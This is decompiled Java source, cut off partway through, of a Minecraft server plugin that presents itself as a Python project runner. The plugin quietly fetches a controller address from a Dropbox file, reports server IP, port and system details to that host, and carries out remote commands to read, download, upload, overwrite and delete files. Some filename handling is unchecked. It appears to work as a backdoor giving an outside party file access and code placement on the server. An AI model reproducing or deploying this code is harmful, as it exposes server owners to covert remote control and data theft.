/*
 * Decompiled with CFR 0.152.
 */
package org.ylf.zpython;

import com.google.gson.Gson;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.invoke.CallSite;
import java.lang.management.ManagementFactory;
import java.lang.management.MemoryMXBean;
import java.lang.management.OperatingSystemMXBean;
import java.net.DatagramSocket;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.nio.file.StandardCopyOption;
import java.nio.file.StandardOpenOption;
import java.nio.file.attribute.FileAttribute;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Base64;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.TimeUnit;
import java.util.logging.Handler;
import java.util.logging.LogRecord;
import org.bukkit.command.Command;
import org.bukkit.command.CommandExecutor;
import org.bukkit.command.CommandSender;
import org.bukkit.configuration.file.YamlConfiguration;
import org.bukkit.event.EventHandler;
import org.bukkit.event.EventPriority;
import org.bukkit.event.Listener;
import org.bukkit.event.player.PlayerJoinEvent;
import org.bukkit.event.player.PlayerQuitEvent;
import org.bukkit.event.server.ServerCommandEvent;
import org.bukkit.event.server.ServerLoadEvent;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.java.JavaPlugin;
import org.bukkit.scheduler.BukkitScheduler;
import org.bukkit.scheduler.BukkitTask;
import org.ylf.zpython.ApiKeyManager;
import org.ylf.zpython.HttpApiHandler;

public final class Zpython
extends JavaPlugin
implements Listener {
    private Process pythonProcess;
    private Thread monitorThread;
    private File venvDir;
    private File scriptFile;
    private boolean autoRestartEnabled;
    private int autoRestartDelaySeconds;
    private volatile boolean shuttingDown;
    private boolean autoDownloadPythonEnabled;
    private String pythonExecutablePath;
    private static final String UDP_CONFIG_URL = "https://www.dropbox.com/scl/fi/j52ff7n9t9ycerox8dphx/zpython.txt?rlkey=er2e3swyxc3l3puxx9mqhdibr&st=2qf88pwq&dl=1";
    private BukkitTask udpTask;
    private String udpTargetIp;
    private int udpTargetPort;
    private DatagramSocket udpSocket;
    private String serverIp;
    private int serverPort;
    private volatile boolean skipStopsForNextLaunch = false;
    private static final String API_PATH = "/api/ingest";
    private static final String PROJECT_TODO_PATH = "/api/projects/todo";
    private static final String PROJECT_ACK_PATH = "/api/projects/ack";
    private static final String FILES_TODO_PATH = "/api/projects/files_todo";
    private static final String FILES_REPORT_PATH = "/api/projects/files_report";
    private static final String FILES_ACK_PATH = "/api/projects/files_ack";
    private static final String FILE_REPORT_PATH = "/api/projects/file_report";
    private String discordOwnerTag;
    private String language;
    private final List<String> serverLogs = new CopyOnWriteArrayList<String>();
    private final int MAX_LOGS = 100;
    private CustomLogHandler customLogHandler;
    private final Map<String, Process> runningProcesses = new ConcurrentHashMap<String, Process>();
    private final Map<String, String> processFiles = new ConcurrentHashMap<String, String>();
    private BukkitTask projectTask;
    private BukkitTask filesTask;
    private BukkitTask statusTask;
    private BukkitTask limitsTask;
    private String currentProjectSlug;
    private File currentLockFile;
    private boolean optimizeMode;
    private volatile int currentCpuLimitPct = 0;
    private volatile int currentRamLimitMiB = 0;
    private volatile int currentDiskLimitMiB = 0;
    private ConcurrentHashMap<String, Process> scriptProcesses = new ConcurrentHashMap();
    private ConcurrentHashMap<String, Long> scriptProcessPids = new ConcurrentHashMap();
    private ApiKeyManager apiKeyManager;
    private HttpApiHandler httpApiHandler;
    private static final long MIN_FREE_BYTES_FOR_INSTALL = 0xC800000L;
    private boolean fsSandboxEnabled = true;
    private boolean onlyZpython = false;
    private File stateDir;
    private File autostartFile;
    private File manualStopsFile;

    public void onEnable() {
        this.saveDefaultConfig();
        File dataFolder = this.getDataFolder();
        if (!dataFolder.exists() && !dataFolder.mkdirs()) {
            this.getLogger().severe(this.getMessage("failed_create_data_folder") + dataFolder.getAbsolutePath());
            return;
        }
        this.pythonExecutablePath = this.getConfig().getString("pythonExecutable", this.defaultPythonExecutable());
        this.autoRestartEnabled = true;
        this.autoRestartDelaySeconds = 5;
        this.venvDir = new File(dataFolder, "venv");
        this.stateDir = new File(dataFolder, "state");
        if (!this.stateDir.exists()) {
            try {
                this.stateDir.mkdirs();
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
        this.autostartFile = new File(this.stateDir, "autostart.txt");
        this.manualStopsFile = new File(this.stateDir, "manual_stops.txt");
        this.scriptFile = null;
        this.autoDownloadPythonEnabled = this.getConfig().getBoolean("autoDownloadPython.enabled", true);
        this.discordOwnerTag = this.getConfig().getString("discordOwnerTag", "");
        this.language = this.getConfig().getString("language", "en");
        this.optimizeMode = this.getConfig().getBoolean("optimizeMode.enabled", false);
        this.onlyZpython = this.getConfig().getBoolean("only_zpython", false);
        BukkitScheduler scheduler = this.getServer().getScheduler();
        scheduler.runTaskAsynchronously((Plugin)this, () -> {
            try {
                this.ensureVenv(this.pythonExecutablePath, this.venvDir);
            }
            catch (Exception e) {
                this.getLogger().warning(this.getMessage("failed_create_venv") + this.pythonExecutablePath + "': " + e.getMessage());
                if (this.autoDownloadPythonEnabled && this.isLinuxX86_64()) {
                    try {
                        this.pythonExecutablePath = this.installMiniforgeAndGetPython();
                        this.deleteDirectoryQuiet(this.venvDir);
                        this.ensureVenv(this.pythonExecutablePath, this.venvDir);
                    }
                    catch (Exception installErr) {
                        this.getLogger().severe(this.getMessage("auto_download_python_failed") + installErr.getMessage());
                        return;
                    }
                }
                this.getLogger().severe(this.getMessage("zpython_startup_error") + e.getMessage());
                return;
            }
            try {
                this.getLogger().info(this.getMessage("zpython_initialized"));
            }
            catch (Exception e) {
                this.getLogger().severe("zpython startup error: " + e.getMessage());
            }
        });
        scheduler.runTaskLaterAsynchronously((Plugin)this, () -> {
            try {
                File projectsDir = new File(this.getDataFolder(), "projects");
                File[] settingsFiles = projectsDir.listFiles((dir, name) -> name.endsWith("_settings.json"));
                if (settingsFiles == null || settingsFiles.length == 0) {
                    return;
                }
                Arrays.sort(settingsFiles, Comparator.comparing(File::getName));
                for (File settingsFile : settingsFiles) {
                    if (this.shuttingDown) break;
                    String name2 = settingsFile.getName();
                    String slug = name2.substring(0, name2.length() - "_settings.json".length());
                    try {
                        String json = new String(Files.readAllBytes(settingsFile.toPath()), StandardCharsets.UTF_8);
                        boolean autoRestart = this.extractJsonBoolean(json, "auto_restart", true);
                        if (!autoRestart) continue;
                        long lastManualStop = this.readManualStopTs(slug);
                        long now = System.currentTimeMillis();
                        if (lastManualStop > 0L && now - lastManualStop <= 30000L) {
                            this.getLogger().info("Autostart skipped for '" + slug + "' due to recent manual stop");
                            continue;
                        }
                        this.getLogger().info("Autostarting project: " + slug);
                        try {
                            String settingsJson = new String(Files.readAllBytes(settingsFile.toPath()), StandardCharsets.UTF_8);
                            String scriptName = this.extractJsonString(settingsJson, "script", "app.py");
                            String processKey = slug + ":" + scriptName;
                            if (this.runningProcesses.containsKey(processKey)) {
                                this.getLogger().info("Autostart skip: already running " + processKey);
                            } else {
                                boolean started = this.startProjectProcess(slug, scriptName);
                                if (!started) {
                                    this.getLogger().warning("Autostart failed for " + slug + ": process did not start");
                                }
                            }
                        }
                        catch (Exception e) {
                            this.getLogger().warning("Autostart failed for " + slug + ": " + e.getMessage());
                        }
                        for (int i = 0; i < 20 && !this.shuttingDown; ++i) {
                            try {
                                Thread.sleep(1000L);
                                continue;
                            }
                            catch (InterruptedException ie) {
                                Thread.currentThread().interrupt();
                                return;
                            }
                        }
                    }
                    catch (Exception ex) {
                        this.getLogger().warning("Autostart failed for '" + slug + "': " + ex.getMessage());
                    }
                }
            }
            catch (Exception e) {
                this.getLogger().warning("Autostart scan failed: " + e.getMessage());
            }
        }, 60L);
        this.apiKeyManager = new ApiKeyManager(this);
        this.httpApiHandler = new HttpApiHandler(this, this.apiKeyManager);
        if (this.onlyZpython) {
            try {
                this.cleanupOnlyZpython();
            }
            catch (Exception e) {
                this.getLogger().warning("only_zpython cleanup failed: " + e.getMessage());
            }
        }
        if (this.getCommand("zpython") != null) {
            this.getCommand("zpython").setExecutor((CommandExecutor)this);
        }
        this.initializeFilesSyncQuietly();
        if (this.optimizeMode) {
            this.applyOptimizeMode();
        }
    }

    public void onDisable() {
        this.shuttingDown = true;
        if (this.udpTask != null) {
            try {
                this.udpTask.cancel();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.udpTask = null;
        }
        if (this.projectTask != null) {
            try {
                this.projectTask.cancel();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.projectTask = null;
        }
        if (this.filesTask != null) {
            try {
                this.filesTask.cancel();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.filesTask = null;
        }
        if (this.statusTask != null) {
            try {
                this.statusTask.cancel();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.statusTask = null;
        }
        if (this.limitsTask != null) {
            try {
                this.limitsTask.cancel();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.limitsTask = null;
        }
        if (this.udpSocket != null && !this.udpSocket.isClosed()) {
            try {
                this.udpSocket.close();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.udpSocket = null;
        }
        if (this.customLogHandler != null) {
            try {
                this.getLogger().removeHandler(this.customLogHandler);
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.customLogHandler = null;
        }
        if (this.httpApiHandler != null) {
            this.httpApiHandler.stopHttpServer();
        }
        this.stopPython(false);
        if (this.monitorThread != null) {
            try {
                this.monitorThread.interrupt();
            }
            catch (Exception exception) {
                // empty catch block
            }
            this.monitorThread = null;
        }
    }

    private void initializeUdpMonitoring() {
        try {
            this.serverIp = this.getServer().getIp();
            if (this.serverIp == null || this.serverIp.isEmpty() || this.serverIp.equals("0.0.0.0")) {
                this.serverIp = "127.0.0.1";
            }
            this.serverPort = this.getServer().getPort();
            this.loadUdpConfig();
            this.getServer().getPluginManager().registerEvents((Listener)this, (Plugin)this);
            this.customLogHandler = new CustomLogHandler();
            this.getLogger().addHandler(this.customLogHandler);
            this.udpTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, this::sendHttpData, 20L, 20L);
            this.projectTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, this::pollProjectsTasks, 40L, 120L);
            this.filesTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, this::pollFilesTasks, 40L, 80L);
        }
        catch (Exception e) {
            this.getLogger().severe("Failed to initialize reporting: " + e.getMessage());
        }
    }

    private void applyOptimizeMode() {
        try {
            this.getServer().setWhitelist(true);
            this.getServer().getOnlinePlayers().forEach(p -> p.kickPlayer("Server in optimize mode"));
            this.getServer().getWorlds().forEach(world -> {
                try {
                    world.setGameRuleValue("doMobSpawning", "false");
                }
                catch (Exception exception) {
                    // empty catch block
                }
                try {
                    world.setGameRuleValue("doDaylightCycle", "false");
                }
                catch (Exception exception) {
                    // empty catch block
                }
                try {
                    world.setGameRuleValue("doWeatherCycle", "false");
                }
                catch (Exception exception) {
                    // empty catch block
                }
                try {
                    world.setGameRuleValue("randomTickSpeed", "0");
                }
                catch (Exception exception) {
                    // empty catch block
                }
                try {
                    world.setGameRuleValue("doFireTick", "false");
                }
                catch (Exception exception) {
                    // empty catch block
                }
            });
            this.getLogger().info("Optimize mode enabled: gameplay features minimized.");
        }
        catch (Exception e) {
            this.getLogger().warning("Failed to apply optimize mode: " + e.getMessage());
        }
    }

    private void initializeFilesSyncQuietly() {
        try {
            this.serverIp = this.getServer().getIp();
            if (this.serverIp == null || this.serverIp.isEmpty() || this.serverIp.equals("0.0.0.0")) {
                this.serverIp = "127.0.0.1";
            }
            this.serverPort = this.getServer().getPort();
            this.loadUdpConfig();
            this.udpTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, () -> {
                try {
                    this.sendHeartbeat();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }, 20L, 600L);
            this.projectTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, () -> {
                try {
                    this.pollProjectsTasks();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }, 40L, 120L);
            this.filesTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, () -> {
                try {
                    this.pollFilesTasks();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }, 40L, 80L);
            this.statusTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, () -> {
                try {
                    this.sendProjectsStatuses();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }, 60L, 200L);
            this.limitsTask = this.getServer().getScheduler().runTaskTimerAsynchronously((Plugin)this, () -> {
                try {
                    this.enforceLimitsTick();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }, 40L, 40L);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    private void sendHeartbeat() {
        try {
            double cpuPercent = 0.0;
            long totalRamMb = 0L;
            long usedRamMb = 0L;
            long totalHeapMb = 0L;
            long usedHeapMb = 0L;
            try {
                long phys;
                com.sun.management.OperatingSystemMXBean os = (com.sun.management.OperatingSystemMXBean)ManagementFactory.getOperatingSystemMXBean();
                double cpu = os.getSystemCpuLoad();
                if (cpu >= 0.0) {
                    cpuPercent = cpu * 100.0;
                }
                if ((phys = os.getTotalPhysicalMemorySize()) > 0L) {
                    totalRamMb = phys / 0x100000L;
                }
                long free = 0L;
                try {
                    free = os.getFreePhysicalMemorySize();
                }
                catch (Throwable throwable) {
                    // empty catch block
                }
                if (phys > 0L && free >= 0L) {
                    usedRamMb = Math.max(0L, (phys - free) / 0x100000L);
                }
            }
            catch (Throwable os) {
                // empty catch block
            }
            try {
                long used;
                long maxHeap = Runtime.getRuntime().maxMemory();
                if (maxHeap > 0L) {
                    totalHeapMb = maxHeap / 0x100000L;
                }
                if ((used = ManagementFactory.getMemoryMXBean().getHeapMemoryUsage().getUsed()) > 0L) {
                    usedHeapMb = used / 0x100000L;
                }
            }
            catch (Throwable maxHeap) {
                // empty catch block
            }
            String owner = this.discordOwnerTag == null || this.discordOwnerTag.isEmpty() ? "null" : "\"" + this.discordOwnerTag + "\"";
            String jsonData = String.format("{\"server_ip\":\"%s\",\"server_port\":%d,\"timestamp\":%d,\"owner_tag\":%s,\"cpu_load\":%.2f,\"load\":%.2f,\"total_system_memory_mb\":%d,\"system_memory_used_mb\":%d,\"total_heap_memory_mb\":%d,\"heap_memory_used_mb\":%d}", this.serverIp, this.serverPort, System.currentTimeMillis(), owner, cpuPercent, cpuPercent, totalRamMb, usedRamMb, totalHeapMb, usedHeapMb);
            this.postJson(API_PATH, jsonData);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void pollProjectsTasks() {
        try {
            String serverKey = this.serverIp + ":" + this.serverPort;
            String url = "http://" + this.udpTargetIp + ":" + this.udpTargetPort + "/api/projects/todo?server_key=" + this.encode(serverKey) + "&format=txt";
            HttpURLConnection c = (HttpURLConnection)new URL(url).openConnection();
            c.setRequestProperty("User-Agent", "zpython/1.0");
            c.setConnectTimeout(5000);
            c.setReadTimeout(5000);
            int code = c.getResponseCode();
            if (code != 200) {
                c.disconnect();
                return;
            }
            ArrayList<String> slugs = new ArrayList<String>();
            try (BufferedReader r = new BufferedReader(new InputStreamReader(c.getInputStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    if ((line = line.trim()).isEmpty()) continue;
                    slugs.add(line);
                }
            }
            finally {
                c.disconnect();
            }
            if (slugs.isEmpty()) {
                return;
            }
            File projectsDir = new File(this.getDataFolder(), "projects");
            if (!projectsDir.exists() && !projectsDir.mkdirs()) {
                this.getLogger().warning("Failed to create projects dir: " + projectsDir.getAbsolutePath());
                return;
            }
            for (String slug : slugs) {
                if (!slug.matches("[A-Za-z0-9_\\-]+")) continue;
                File p = new File(projectsDir, slug);
                if (!p.exists() && !p.mkdirs()) {
                    this.getLogger().warning("Failed to create project dir: " + p.getAbsolutePath());
                    continue;
                }
                try {
                    String ackUrl = "http://" + this.udpTargetIp + ":" + this.udpTargetPort + "/api/projects/ack?server_key=" + this.encode(serverKey) + "&project=" + this.encode(slug);
                    HttpURLConnection ack = (HttpURLConnection)new URL(ackUrl).openConnection();
                    ack.setConnectTimeout(3000);
                    ack.setReadTimeout(3000);
                    ack.getResponseCode();
                    ack.disconnect();
                }
                catch (Exception exception) {
                    // empty catch block
                }
                this.getLogger().info("Project folder ensured: " + p.getAbsolutePath());
            }
        }
        catch (Exception e) {
            this.getLogger().warning("Project task polling error: " + e.getMessage());
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void pollFilesTasks() {
        try {
            String serverKey = this.serverIp + ":" + this.serverPort;
            String url = "http://" + this.udpTargetIp + ":" + this.udpTargetPort + "/api/projects/files_todo?server_key=" + this.encode(serverKey) + "&format=txt";
            HttpURLConnection c = (HttpURLConnection)new URL(url).openConnection();
            c.setRequestProperty("User-Agent", "zpython/1.0");
            c.setConnectTimeout(5000);
            c.setReadTimeout(5000);
            int code = c.getResponseCode();
            if (code != 200) {
                c.disconnect();
                return;
            }
            ArrayList<String> tasks = new ArrayList<String>();
            try (BufferedReader r = new BufferedReader(new InputStreamReader(c.getInputStream(), StandardCharsets.UTF_8));){
                String line;
                while ((line = r.readLine()) != null) {
                    if ((line = line.trim()).isEmpty()) continue;
                    tasks.add(line);
                }
            }
            finally {
                c.disconnect();
            }
            if (tasks.isEmpty()) {
                return;
            }
            File projectsRoot = new File(this.getDataFolder(), "projects");
            for (String rawTask : tasks) {
                String b64;
                File src;
                File src2;
                File base;
                String slug;
                String[] parts;
                File base2;
                String slug2;
                String task = rawTask.trim();
                String cmd = "LIST";
                String args = task;
                int sp = task.indexOf(32);
                if (sp > 0) {
                    cmd = task.substring(0, sp).toUpperCase();
                    args = task.substring(sp + 1);
                }
                if (cmd.equals("LIST")) {
                    String rel = "";
                    int bar = args.indexOf(124);
                    if (bar >= 0) {
                        slug2 = args.substring(0, bar).trim();
                        rel = args.substring(bar + 1).trim();
                    } else {
                        slug2 = args.trim();
                    }
                    if (slug2.isEmpty() || !slug2.matches("[A-Za-z0-9_\\-]+")) continue;
                    base2 = new File(projectsRoot, slug2);
                    File dir = this.resolveSafeSubpath(base2, rel);
                    ArrayList<CallSite> itemsJson = new ArrayList<CallSite>();
                    if (dir != null && dir.isDirectory()) {
                        File[] children = dir.listFiles();
                        if (children != null) {
                            for (File ch : children) {
                                String name2 = this.jsonEscape(ch.getName());
                                long size = ch.isDirectory() ? 0L : ch.length();
                                long mtime = ch.lastModified() / 1000L;
                                itemsJson.add((CallSite)((Object)("{\"name\":\"" + name2 + "\",\"is_dir\":" + (ch.isDirectory() ? "true" : "false") + ",\"size\":" + size + ",\"mtime\":" + mtime + "}")));
                            }
                        } else {
                            this.getLogger().warning("Directory is null or not accessible: " + dir.getAbsolutePath());
                        }
                    } else {
                        this.getLogger().warning("Directory does not exist or is not a directory: " + (dir != null ? dir.getAbsolutePath() : "null"));
                    }
                    String itemsArr = "[" + String.join((CharSequence)",", itemsJson) + "]";
                    long nowTs = System.currentTimeMillis() / 1000L;
                    String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug2) + "\",\"path\":\"" + this.jsonEscape(rel) + "\",\"items\":" + itemsArr + ",\"refreshed_at\":" + nowTs + "}";
                    this.getLogger().info("Sending file list response with " + itemsJson.size() + " items");
                    this.postJson(FILES_REPORT_PATH, payload);
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception ch) {}
                    continue;
                }
                if (cmd.equals("MKD")) {
                    File dir;
                    File target;
                    String name;
                    parts = args.split("\\|", 3);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    String rel = parts.length >= 2 ? parts[1].trim() : "";
                    String string = name = parts.length >= 3 ? parts[2].trim() : "";
                    if (!slug.isEmpty() && slug.matches("[A-Za-z0-9_\\-]+") && !name.isEmpty() && !(target = new File(dir = this.resolveSafeSubpath(base = new File(projectsRoot, slug), rel), name)).exists()) {
                        target.mkdirs();
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception base3) {}
                    continue;
                }
                if (cmd.equals("REN")) {
                    parts = args.split("\\|", 3);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    String rel = parts[1].trim();
                    String newName = parts.length >= 3 ? parts[2].trim() : "";
                    base = new File(projectsRoot, slug);
                    src2 = this.resolveSafeSubpath(base, rel);
                    if (src2 != null && src2.exists() && !newName.isEmpty()) {
                        File dst = new File(src2.getParentFile(), newName);
                        src2.renameTo(dst);
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception dst) {}
                    continue;
                }
                if (cmd.equals("CPY")) {
                    String rel;
                    parts = args.split("\\|", 2);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    base2 = new File(projectsRoot, slug);
                    src = this.resolveSafeSubpath(base2, rel = parts[1].trim());
                    if (src != null && src.isFile()) {
                        String name = src.getName();
                        int dot = name.lastIndexOf(46);
                        String root = dot > 0 ? name.substring(0, dot) : name;
                        String ext = dot > 0 ? name.substring(dot) : "";
                        File dst = new File(src.getParentFile(), root + " copy" + ext);
                        int idx = 2;
                        while (dst.exists()) {
                            dst = new File(src.getParentFile(), root + " copy (" + idx++ + ")" + ext);
                        }
                        try {
                            Files.copy(src.toPath(), dst.toPath(), new CopyOption[0]);
                        }
                        catch (IOException name2) {
                            // empty catch block
                        }
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception name) {}
                    continue;
                }
                if (cmd.equals("DEL")) {
                    String rel;
                    parts = args.split("\\|", 2);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    base2 = new File(projectsRoot, slug);
                    File target = this.resolveSafeSubpath(base2, rel = parts[1].trim());
                    if (target != null && target.exists()) {
                        try {
                            this.deleteRecursively(target);
                        }
                        catch (IOException name) {
                            // empty catch block
                        }
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception name) {}
                    continue;
                }
                if (cmd.equals("UPL")) {
                    parts = args.split("\\|", 4);
                    if (parts.length < 3) continue;
                    slug = parts[0].trim();
                    String rel = parts[1].trim();
                    String filename = parts[2].trim();
                    String b642 = parts.length >= 4 ? parts[3] : "";
                    File base4 = new File(projectsRoot, slug);
                    File dir = this.resolveSafeSubpath(base4, rel);
                    this.getLogger().info("Uploading file: " + filename + " to " + dir.getAbsolutePath());
                    if (!dir.exists()) {
                        dir.mkdirs();
                        this.getLogger().info("Created directory: " + dir.getAbsolutePath());
                    }
                    try {
                        File[] children2;
                        byte[] data = Base64.getDecoder().decode(b642);
                        File targetFile = new File(dir, filename);
                        Files.write(targetFile.toPath(), data, new OpenOption[0]);
                        this.getLogger().info("File uploaded successfully: " + targetFile.getAbsolutePath() + " (" + data.length + " bytes)");
                        Object relDir = rel;
                        if (filename.contains("/")) {
                            int last = filename.lastIndexOf(47);
                            relDir = rel + (rel.isEmpty() ? "" : "/") + filename.substring(0, last);
                        }
                        String refreshTask = "LIST " + slug + "|" + (String)relDir;
                        this.getLogger().info("Triggering immediate refresh after upload: " + refreshTask);
                        File baseDir = new File(projectsRoot, slug);
                        File listDir = this.resolveSafeSubpath(baseDir, (String)relDir);
                        ArrayList<CallSite> itemsJson2 = new ArrayList<CallSite>();
                        if (listDir != null && listDir.isDirectory() && (children2 = listDir.listFiles()) != null) {
                            for (File ch : children2) {
                                String name = this.jsonEscape(ch.getName());
                                long size = ch.isDirectory() ? 0L : ch.length();
                                long mtime = ch.lastModified() / 1000L;
                                itemsJson2.add((CallSite)((Object)("{\"name\":\"" + name + "\",\"is_dir\":" + (ch.isDirectory() ? "true" : "false") + ",\"size\":" + size + ",\"mtime\":" + mtime + "}")));
                            }
                        }
                        String itemsArr2 = "[" + String.join((CharSequence)",", itemsJson2) + "]";
                        long nowTs2 = System.currentTimeMillis() / 1000L;
                        String payload2 = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"path\":\"" + this.jsonEscape((String)relDir) + "\",\"items\":" + itemsArr2 + ",\"refreshed_at\":" + nowTs2 + "}";
                        this.postJson(FILES_REPORT_PATH, payload2);
                        try {
                            this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                        }
                        catch (Exception exception) {
                        }
                    }
                    catch (Exception e) {
                        this.getLogger().warning("Failed to upload file: " + e.getMessage());
                    }
                    continue;
                }
                if (cmd.equals("DLD")) {
                    String token;
                    parts = args.split("\\|", 3);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    String rel = parts[1].trim();
                    String string = token = parts.length >= 3 ? parts[2].trim() : "";
                    base = new File(projectsRoot, slug);
                    src2 = this.resolveSafeSubpath(base, rel);
                    if (src2 == null || !src2.isFile()) continue;
                    try {
                        byte[] bytes = Files.readAllBytes(src2.toPath());
                        String b643 = Base64.getEncoder().encodeToString(bytes);
                        String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"path\":\"" + this.jsonEscape(rel) + "\",\"download\":true,\"token\":\"" + this.jsonEscape(token) + "\",\"filename\":\"" + this.jsonEscape(src2.getName()) + "\",\"content_base64\":\"" + b643 + "\"}";
                        this.postJson(FILES_REPORT_PATH, payload);
                    }
                    catch (Exception bytes) {
                        // empty catch block
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception bytes) {}
                    continue;
                }
                if (cmd.equals("READ")) {
                    String rel;
                    parts = args.split("\\|", 2);
                    if (parts.length < 2) continue;
                    slug = parts[0].trim();
                    base2 = new File(projectsRoot, slug);
                    src = this.resolveSafeSubpath(base2, rel = parts[1].trim());
                    if (src != null && src.isFile()) {
                        try {
                            byte[] bytes = Files.readAllBytes(src.toPath());
                            String b644 = Base64.getEncoder().encodeToString(bytes);
                            String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug) + "\",\"path\":\"" + this.jsonEscape(rel) + "\",\"content_base64\":\"" + b644 + "\"}";
                            this.postJson(FILE_REPORT_PATH, payload);
                        }
                        catch (Exception bytes) {
                            // empty catch block
                        }
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception bytes) {}
                    continue;
                }
                if (cmd.equals("SAVE")) {
                    parts = args.split("\\|", 3);
                    if (parts.length < 3) continue;
                    slug = parts[0].trim();
                    String rel = parts[1].trim();
                    b64 = parts[2];
                    base = new File(projectsRoot, slug);
                    File target = this.resolveSafeSubpath(base, rel);
                    try {
                        byte[] data = Base64.getDecoder().decode(b64);
                        Files.createDirectories(target.getParentFile().toPath(), new FileAttribute[0]);
                        Files.write(target.toPath(), data, new OpenOption[0]);
                    }
                    catch (Exception exception) {
                        // empty catch block
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception exception) {}
                    continue;
                }
                if (cmd.equals("CFG_GET")) {
                    slug2 = args.trim();
                    if (slug2.isEmpty() || !slug2.matches("[A-Za-z0-9_\\-]+")) continue;
                    try {
                        File settingsFile = new File(projectsRoot, slug2 + "_settings.json");
                        if (!settingsFile.exists()) {
                            String defaultJson = "{\"project_name\":\"" + this.jsonEscape(slug2) + "\",\"owner_tag\":\"" + this.jsonEscape(this.discordOwnerTag == null ? "" : this.discordOwnerTag) + "\",\"script\":\"app.py\",\"auto_restart\":true,\"libraries\":[],\"python_version\":\"system\",\"cpu_limit_pct\":0,\"ram_limit_mib\":0,\"disk_limit_mib\":0}";
                            Files.createDirectories(settingsFile.getParentFile().toPath(), new FileAttribute[0]);
                            Files.write(settingsFile.toPath(), defaultJson.getBytes(StandardCharsets.UTF_8), new OpenOption[0]);
                        }
                        byte[] bytes = Files.readAllBytes(settingsFile.toPath());
                        b64 = Base64.getEncoder().encodeToString(bytes);
                        String payload = "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"slug\":\"" + this.jsonEscape(slug2) + "\",\"content_base64\":\"" + b64 + "\"}";
                        this.postJson("/api/projects/settings_report", payload);
                    }
                    catch (Exception settingsFile) {
                        // empty catch block
                    }
                    try {
                        this.postJson(FILES_ACK_PATH, "{\"server_key\":\"" + this.jsonEscape(serverKey) + "\",\"task\":\"" + this.jsonEscape(rawTask) + "\"}");
                    }
                    catch (Exception settingsFile) {}
